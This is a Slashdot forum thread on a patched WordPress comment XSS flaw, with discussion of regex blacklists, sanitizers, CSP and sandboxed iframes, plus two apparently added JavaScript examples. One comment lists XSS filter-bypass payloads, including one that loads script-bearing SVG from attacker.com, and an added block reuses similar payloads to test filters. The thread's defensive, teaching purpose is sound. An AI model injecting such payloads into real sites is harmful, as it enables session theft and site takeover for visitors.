Slashdot Mirror


Critical XSS Flaws Patched In WordPress and Popular Plug-In

itwbennett writes The WordPress development team on Thursday released critical security updates that address an XSS vulnerability in the comment boxes of WordPress posts and pages. An attacker could exploit this flaw to create comments with malicious JavaScript code embedded in them that would get executed by the browsers of users seeing those comments. 'In the most obvious scenario the attacker leaves a comment containing the JavaScript and some links in order to put the comment in the moderation queue,' said Jouko Pynnonen, the security researcher who found the flaw.

41 comments

  1. See? by Anonymous Coward · · Score: 0

    This is why Slashdot shouldn't use unicode...

  2. Regular expressions by GeLeTo · · Score: 1, Insightful

    Sanitizing HTML input with regular expressions, what could possibly go wrong?

    1. Re:Regular expressions by davester666 · · Score: 1

      They should dump html, skip Javascript, and just jump to accepting comments written in Go.

      --
      Sleep your way to a whiter smile...date a dentist!
    2. Re:Regular expressions by x0ra · · Score: 1

      Do you have a better solution?

      Editing a mixup of text & html is rather inconvenient. I used to parse a web page using sed(1) after a pre-processing with tidy, but given the difficulty of constantly adapting to changes of formatting and constantly changing tags, I had to resort to using XSLT. Though, it is not a perfect solution either when the input is not properly structured. Right now, I'm extracting part of the content with good old regex, and doing the finer work with XSLT.

    3. Re:Regular expressions by ls671 · · Score: 1

      Running wp without at least a WAF in front of it, what could possibly go wrong?

      --
      Everything I write is lies, read between the lines.
    4. Re:Regular expressions by Spy+Handler · · Score: 2

      Wouldn't simply stripping out "
      Like, whatever the user posted doesn't have to look properly formatted or anything, he's trying to inject malicious javascript... the Wordpress site owner will be deleting the comment as soon as it's discovered, right?

    5. Re: Regular expressions by GeLeTo · · Score: 1

      Use a proper HTML sanitizer. Yes, this is much bulkier than just throwing a regexp, but this is for a reason. Just look at the security advisories for google caja for instance: https://code.google.com/p/goog...
      There's no way a simple regex can take care of all these cases, if WP just updated the regex - it is bound to be full of holes.

    6. Re: Regular expressions by GeLeTo · · Score: 1

      No, you have complex escape sequences, encoding tricks, browsers interpreting invalid HTML differently... This is much more complex than it looks.

    7. Re: Regular expressions by x0ra · · Score: 1

      By your standards I wouldn't trust Google Caja... there have been a lot of security vulnerabilities in the past years as well...

    8. Re: Regular expressions by TheLink · · Score: 1

      Many of these exploits and xss-worms would not have been effective if people had implemented the suggestion I made more than a decade ago:
      http://osdir.com/ml/mozilla.se...
      http://osdir.com/ml/security.w...
      http://lists.w3.org/Archives/P...

      Plenty of people suggest libraries to sanitize stuff, but when people keep creating new "GO" buttons and never a single "STOP" button - how can you be sure you've disabled every possible "GO" button? With my proposal, a "STOP button" could even disable future yet to be invented "GO" buttons.

      Anyway since the Mozilla bunch supposedly have a better idea, how about getting on with it: https://developer.mozilla.org/...

    9. Re:Regular expressions by x0ra · · Score: 1

      If the purpose of the XSS is to create a second admin account, all it takes is for the owner to consult the comment ...

    10. Re: Regular expressions by Anonymous Coward · · Score: 0

      You might be interested in this: http://www.html5rocks.com/en/tutorials/security/sandboxed-iframes/

    11. Re: Regular expressions by Anonymous Coward · · Score: 0

      That's what the last link in the post is about.

    12. Re: Regular expressions by cbhacking · · Score: 1

      Content Security Policy (as you link) is indeed a "better" solution, in the technical sense; it's fine-grained, supports reporting, doesn't require servers to generate the random "hard_to_guess_string" needed to unlock the block, and (possibly most important) doesn't introduce a new un-XML-like construct into HTML. On the other hand, it tends to be more complicated to use it in real-world web applications, and it's so broad that a lot of browsers have either no support for it or have serious bugs in their support (did you know SVG can contain scripts, and sometimes CSP rules aren't applied properly there?).

      Sandboxed iframes are simpler and basically do what you're asking for, except that the content is loaded from an external source or by writing it into the framed document (if same-origin); no need to worry about an attacker terminating the sandbox with a </iframe> tag because the sandboxed content isn't inline with the iframe itself. On the other hand, given how few people actually use them (despite pretty good browser support), the problem may be more a matter of web devs being bad at security than of web devs not having good security tools. Of course, we knew that already...

      With all that said, I feel compelled to point out that *just* blocking XSS isn't enough anyhow. Without using a single scripted behavior (just HTML and some simple CSS) I can do things like create a lightbox that contains an HTML form saying "Your login session has expired. To ensure the security of your account, please log in again." with a username/password box, all themed accordingly with the site I'm attacking. Of course, the form POSTs to a web server that I (the attacker) control, but you don't know that. There are many other types of things you can do with the same restrictions. It's not enough to block scripts and plugins, you also have to prevent the attacker from simply taking over the page with their own content by layering it on top of the Z-order.

      --
      There's no place I could be, since I've found Serenity...
    13. Re:Regular expressions by cbhacking · · Score: 4, Interesting

      <img src="xss" onerror="alert('Nope!')" />
      <iframe src="javascript:alert('That won't work.')"></iframe>
      <object data="http://attacker.com/SvgCanContainScriptsAndCanUseTheParentObjectToAttackTheHostingPage.svg"></object>
      <scri<scriptpt>alert("In fact, that kind of blacklisting is trivial to bypass.");</script>
      <form action="javascript:alert('I once spent a month breaking a client's blacklist every time they updated it to block my last POC exploit, telling them all the while they had to use output encoding.');"><input type="submit" value="SPOILER" /></form>
      <h1 onmouseover="alert('They eventually did, but oh man did they waste a lot of time trying variants on your suggestion first!')">REALLY BIG TEXT THAT YOUR MOUSE WILL GO OVER</h1>

      People thinking like you do frequently leads to exactly this sort of problem, where something *supposedly* has XSS protection but in fact totally doesn't. With the possible exception of the nested script tags (if you're smart enough to run the filter repeatedly until no further hits occur, that'll be caught), every single one of these lines will execute arbitrary attacker-controlled JavaScript through the filter that you propose. I strongly recommend that you go read OWASP, especially the top 10, and in the meantime I hope you haven't written any in-production web applications...

      --
      There's no place I could be, since I've found Serenity...
    14. Re: Regular expressions by Anonymous Coward · · Score: 0

      Noo, please read the full paragraph. It's like "CSP is good. BUT sandboxed iframes are better." You only read that first sentence, and thought the article was about CSP.

    15. Re:Regular expressions by Bigbutt · · Score: 1

      Yep. I have to approve all comments.

      [John]

      --
      Shit better not happen!
    16. Re:Regular expressions by ArsonSmith · · Score: 1
      --
      Paying taxes to buy civilization is like paying a hooker to buy love.
    17. Re:Regular expressions by Anonymous Coward · · Score: 0

      The basic problem is that WordPress is written in PHP and blacklisting (especially using regular expressions) is very deeply entrenched in the PHP community. (I should know, I used to do PHP web development until I had to quit to regain my sanity.)

      The cause behind this is twofold:

      1) The PHP language itself isn't big on making it easy to properly encode text. In addition, PHP makes it very, very easy to implement basic blacklisting, especially using regular expressions. The thing is, most developers learn more from the language and framework in which they're developing than they ever learn at university. So if the language is bad, you'll get bad developers.

      2) The PHP community is very resistant to change and very defensive about well-deserved criticism. If you visit PHP forums and such on the internet, like I used to do, you get the feeling that you're inside a combination of a fortress and an echo-chamber. This means that good ideas from outside the PHP community tend not to enter it, and it also means that PHP developers are to a large extent taught by other PHP developers, who tend to be the worst teachers because they're PHP developers.

      If I could ban PHP, I would.

    18. Re:Regular expressions by Anonymous Coward · · Score: 0

      Just for reference, there are some of us who do employ proper parameter validation and white-listing, filtering of all incoming and outgoing data, including escaping any and all output. While still using PHP.

      But I agree. More should do so.

  3. Kinda like bailing in a sinking ship by Anonymous Coward · · Score: 0

    Follow the rats!

  4. Just too bad by Anonymous Coward · · Score: 0

    that this "security researcher"'s website doesn't render and doesn't do graceful degradation.

  5. There's a solution by Anonymous Coward · · Score: 0

    Why isn't everybody just running Slashcode? Would it be because the messaging system gets borked occasionally?

    Hiiiii, can you fix please?

    1. Re:There's a solution by Dracos · · Score: 2

      The real question is, Why is anybody still running WordPress?

    2. Re:There's a solution by drinkypoo · · Score: 3, Insightful

      The real question is, Why is anybody still running WordPress?

      Because Drupal has security flaws, too.

      Not everyone wants to write their own CMS and deal with the security issues. Wordpress probably is the absolutely worst choice, though.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    3. Re:There's a solution by Zedrick · · Score: 4, Insightful

      Because it's very easy to use for people with their own domain but little tech knowledge, it has a massive amount of themes and plugins to choose from (which I admit can be a problem) and it has far fewer security issues than any comparable CMS.

      I've worked with hosting abuse for a long time, and it's fairly rare to see a hacked WP nowadays - unless the owner of the site has turned off auto-updating. Hacked Joomla-, modX- or Drupal-sites are much more common.

    4. Re:There's a solution by XXeR · · Score: 1

      The real question is, Why is anybody still running WordPress?

      Yeah, nearly a quarter of the Internet runs it...what imbeciles!

      http://w3techs.com/technologie...

    5. Re:There's a solution by Bigbutt · · Score: 1

      Why not? I'm using it for a couple of my sites. Comments must be approved by me and I've locked down access to the admin directory to only accept logins from my home machine.

      Instead of saying "Why?", provide suggestions as to a good replacement.

      "WordPress has so many security holes mostly due to insecure themes and plugins. Why not use Drupal or at least make sure you follow these steps to secure your site."

      It's just annoying to hear "what a piece of shit, what idiot uses [whatever you don't particularly like]?" Folks like me will simply disregard your comment as unhelpful and continue using whatever software (or Wine or Whiskey or Car or Programming Language or Beer or Blog Software or Linux distro (or BSD distro)) you don't particularly like.

      [John]

      --
      Shit better not happen!
  6. That's why pages should be usable without js by Anonymous Coward · · Score: 1

    This is an appeal to all Web site designers.

    Instead of scrambling to plug each hole, allow your users to protect themselves by browsing scriptless (and for another reason: cookieless).

    I mean: do degrade the bling-bling, but degrade *gracefully*.

    I browse scriptless (and for the most part cookieless) and from time to time stumble upon pages which turn up blank when Javascript is disabled. Those come into my blacklist (perhaps, one day I'll publish that blacklist).

    1. Re:That's why pages should be usable without js by Anonymous Coward · · Score: 1

      I make all my websites work without javascript first, and then add the bling bling where needed.

      In my experience, degrading gracefully is much harder to do than adding javascript functionality later. Given that you do design the javascript systems beforehand and not just as an afterthought (that leads to a mess and hacking the existing code).

    2. Re:That's why pages should be usable without js by Anonymous Coward · · Score: 0

      > I make all my websites work without javascript first

      Good for you. Thank you for that.

      > In my experience, degrading gracefully is much harder to do than adding javascript functionality later

      Got that. Seems I expressed myself ambiguously: by "degrading gracefully" I rather meant that the page falls back to sensible behaviour when js is missing -- regardless of the design process which led to said page. Writing clearly is hard, sorry for that.

  7. To quote QDB... by canadiannomad · · Score: 0

    WordPress is an unauthenticated remote shell that, as a useful side feature, also contains a blog.

    --
    Hmm, the humour and sarcasm seem to have been lost on you.
  8. some good PHP-based libraries like htmlawed by Anonymous Coward · · Score: 0

    There are some good PHP-based libraries like htmLawed to protect against such issues.

  9. Attackers take control of websites? by lippydude · · Score: 1

    "New security updates released for the WordPress .. fix cross-site scripting (XSS) vulnerabilities that could allow attackers to take control of websites."

    Embedded javascript in a comment box could trigger exploits on Microsoft Internet Explorer running on Microsoft Windows desktops.

    1. Re:Attackers take control of websites? by benjymouse · · Score: 1

      "New security updates released for the WordPress .. fix cross-site scripting (XSS) vulnerabilities that could allow attackers to take control of websites."

      Embedded javascript in a comment box could trigger exploits on Microsoft Internet Explorer running on Microsoft Windows desktops.

      Source? Or just trolling?

      --
      Reading slashdot one-liner: (irm http://rss.slashdot.org/Slashdot/slashdot).rdf.item | fl title,desc*
  10. Content Security Policy by Njovich · · Score: 2

    One highly underused technology is the Content Security Policy. It is supported in all major browsers, including IE10+.

    With simple headers you can prevent anyone from using inline javascript or including scripts from non-whitelisted domains. For instance, the following headers would make inline scripts not execute, and only execute javascript from the whitelisted domains:

    Content-Security-Policy: script-src 'self' www.google-analytics.com ajax.googleapis.com;
    X-Content-Security-Policy: script-src 'self' www.google-analytics.com ajax.googleapis.com;

    If projects like Wordpress would pick this up, it would make it very difficult to do XSS attacks.
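
What the two headers above actually permit and deny is easier to see with a small model of the browser's decision. The block below is an added example, not code from the thread, from WordPress or from any browser: it parses the script-src directive and decides, for an inline script or event handler versus an external script URL, whether the policy allows it. It is deliberately simplified (no hashes, paths, 'strict-dynamic' or scheme-upgrade rules, and a scheme-less host matches any scheme, where real CSP restricts it to the page's scheme or https) and it goes one step beyond the comment by also modelling per-response nonces, which are how a site with legitimate inline scripts keeps 'unsafe-inline' out of its policy. The blog origin is a placeholder.

```javascript
// Added example (not from the thread, WordPress or any browser). Node.js, no dependencies.
// A simplified model of how a browser evaluates a CSP script-src directive:
// 'self', host names with optional scheme, port and leading wildcard,
// 'unsafe-inline', 'none' and nonces. Hashes, paths, 'strict-dynamic' and
// scheme-upgrade rules are left out.

// Pull the script-src source list out of a header value such as
// "script-src 'self' www.google-analytics.com ajax.googleapis.com;"
function parseScriptSrc(headerValue) {
  for (const directive of headerValue.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === "script-src") return tokens.slice(1);
  }
  return []; // no script-src: a real browser would fall back to default-src
}

const DEFAULT_PORT = { "http:": "80", "https:": "443" };

function hostMatches(pattern, host) {
  if (pattern.startsWith("*.")) {            // "*.googleapis.com"
    const suffix = pattern.slice(1);         // ".googleapis.com"
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return pattern === host;                   // no implicit wildcard: exact host only
}

// Does one source expression permit loading the external script at url?
function sourceMatches(expr, url, pageOrigin) {
  if (expr === "'self'") return url.origin === pageOrigin;
  if (expr === "*") return url.protocol === "http:" || url.protocol === "https:";
  // host-source: [scheme://]host[:port], e.g. https://cdn.example:8443
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([a-z0-9.*-]+)(?::(\d+|\*))?$/i.exec(expr);
  if (!m) return false;                      // keywords such as 'unsafe-inline' never match a URL
  const [, scheme, hostPattern, port] = m;
  if (scheme && scheme.toLowerCase() + ":" !== url.protocol) return false; // scheme-less: any scheme (simplified)
  if (!hostMatches(hostPattern.toLowerCase(), url.hostname)) return false;
  if (port && port !== "*" && port !== (url.port || DEFAULT_PORT[url.protocol])) return false;
  return true;
}

// script is { inline: true, nonce?: string } for a <script> block or an on*
// attribute (both are "inline" to CSP), or { src: string } for an external
// script. pageOrigin is the origin of the document the header protects.
function scriptAllowed(headerValue, script, pageOrigin) {
  const sources = parseScriptSrc(headerValue);
  if (sources.includes("'none'")) return false;
  if (script.inline) {
    // A nonce minted by the server per response unlocks that one inline script;
    // an attacker's injected comment cannot know it in advance.
    if (script.nonce !== undefined && sources.includes(`'nonce-${script.nonce}'`)) return true;
    // Real CSP ignores 'unsafe-inline' once a nonce or hash is present; not modelled here.
    return sources.includes("'unsafe-inline'");
  }
  const url = new URL(script.src, pageOrigin);
  return sources.some((expr) => sourceMatches(expr, url, pageOrigin));
}

// The policy quoted above, applied to a hypothetical blog origin.
const POLICY = "script-src 'self' www.google-analytics.com ajax.googleapis.com;";
const PAGE = "https://blog.example";

const CASES = [
  ["injected <script> in a comment",         { inline: true }],
  ["injected onerror= handler in a comment",  { inline: true }],
  ["/wp-includes/js/jquery.js (same origin)", { src: "/wp-includes/js/jquery.js" }],
  ["https://ajax.googleapis.com/.../jquery.min.js", { src: "https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js" }],
  ["https://attacker.example/evil.js",        { src: "https://attacker.example/evil.js" }],
];
for (const [label, script] of CASES) {
  console.log(`${scriptAllowed(POLICY, script, PAGE) ? "ALLOW" : "BLOCK"}  ${label}`);
}
```

The first two cases are what a comment-box XSS produces, and the policy blocks both without any change to the comment filter; the price is that every legitimate inline script on the page also stops working unless it is moved into a file served from an allowed host or given a nonce.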

  11. onload, scrscriptipt by raymorris · · Score: 1

    onLoad=(yourscrewed)

    No script tag there.

    How about if I enter scrscriptipt? When you remove "script" from the middle, you end up with - script.

    Removing stuff will pretty much never work. You have to htmlencode the output.
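
raymorris's scrscriptipt and the payload list in cbhacking's comment #13 make the same point from two directions: deleting things from the input is a losing game, encoding the output is not. The block below is an added example, not code from the thread or from WordPress: it runs constructed payloads modelled on both comments through a filter that strips script tags, a filter that strips the word "script", a "repeat until nothing changes" version of each, and a plain HTML encoder, and counts how many still contain something a browser would execute. The judge is a handful of regexes written for this example; a real browser parses far more leniently, so its survivor counts are a lower bound, not a safety proof.

```javascript
// Added example (not from the thread or from WordPress). Node.js, no dependencies.
// Compares two blacklist filters, their "repeat until stable" variants and plain
// HTML output encoding against payloads modelled on cbhacking's and raymorris's.

// Blacklist 1: delete <script ...> and </script> tags.
function stripScriptTags(comment) {
  return comment.replace(/<\/?script\b[^>]*>/gi, "");
}

// Blacklist 2: delete every occurrence of the word "script" (raymorris's target).
function stripScriptWord(comment) {
  return comment.replace(/script/gi, "");
}

// The "smarter" blacklist cbhacking concedes: re-run the filter until the text
// stops changing, so a single nesting trick does not survive one pass.
function untilStable(filter) {
  return function (comment) {
    let prev;
    do {
      prev = comment;
      comment = filter(comment);
    } while (comment !== prev);
    return comment;
  };
}

// What raymorris recommends instead: encode at output time. Nothing is removed,
// so nothing can be reassembled; the browser renders the comment as text.
function htmlEncode(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Minimal judge used only by this example: does the output still contain markup
// that would run attacker code or load attacker content? A browser's parser is
// far more lenient than these four patterns, so "0 survivors" here is
// necessary, not sufficient, for a filter to be safe.
const EXECUTABLE = [
  /<script\b/i,                                                  // script element
  /<(?:iframe|object|embed)\b/i,                                 // loads attacker-chosen content
  /<[a-z][^>]*\son[a-z]+\s*=/i,                                  // event-handler attribute inside a tag
  /<[a-z][^>]*\b(?:src|href|action)\s*=\s*["']?\s*javascript:/i, // javascript: URL inside a tag
];
function looksExecutable(html) {
  return EXECUTABLE.some((re) => re.test(html));
}

// Constructed payloads, modelled on the ones posted above (attacker.example is a placeholder).
const PAYLOADS = [
  '<img src="xss" onerror="alert(1)" />',
  '<iframe src="javascript:alert(2)"></iframe>',
  '<object data="https://attacker.example/evil.svg"></object>',
  "<scr<script>ipt>alert(3);</script>",      // nested tag: beats tag stripping once
  '<h1 onmouseover="alert(4)">hover me</h1>',
  "<scrscriptipt>alert(5)</scrscriptipt>",   // raymorris: beats word stripping once
];

// The payloads that still look executable after passing through filter.
function survivors(filter) {
  return PAYLOADS.filter((p) => looksExecutable(filter(p)));
}

// Stand-alone run: print a scoreboard.
const FILTERS = {
  "strip <script> tags": stripScriptTags,
  "strip the word script": stripScriptWord,
  "strip tags until stable": untilStable(stripScriptTags),
  "strip word until stable": untilStable(stripScriptWord),
  "HTML-encode output": htmlEncode,
};
for (const [name, f] of Object.entries(FILTERS)) {
  console.log(`${name.padEnd(26)} ${survivors(f).length}/${PAYLOADS.length} payloads still executable`);
}
```

Repeating the filter only fixes the one payload built to beat a single pass; the event handlers, the javascript: URL and the object element never contained the blacklisted string to begin with. The encoder leaves nothing for the judge to find because no "<" survives at all, which is the property a blacklist cannot offer.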

  12. wait a minute... by slashmydots · · Score: 1

    Do you mean to tell me that running overcomplicated garbage code on 10 million websites that uses 15 divs and 3 databases to draw the word "the" on the page might be vulnerable to cross site scripting? I never would have guessed! (I'm a by-hand HTML designer by the way).

    1. Re:wait a minute... by Anonymous Coward · · Score: 0

      (I'm a by-hand HTML designer by the way)

      "I write ugly and unusable crap, but at least I write it really slowly!"

    2. Re:wait a minute... by Anonymous Coward · · Score: 0

      (I'm a by-hand HTML designer by the way)

      "I write ugly and unusable crap, but at least I write it really slowly!"

      "that renders exactly the same on every browser... and not because a CMS implemented a bunch of compatibility hacks, but because it can completely avoid incompatibilities because there are no dependencies."

      "right" is subjective.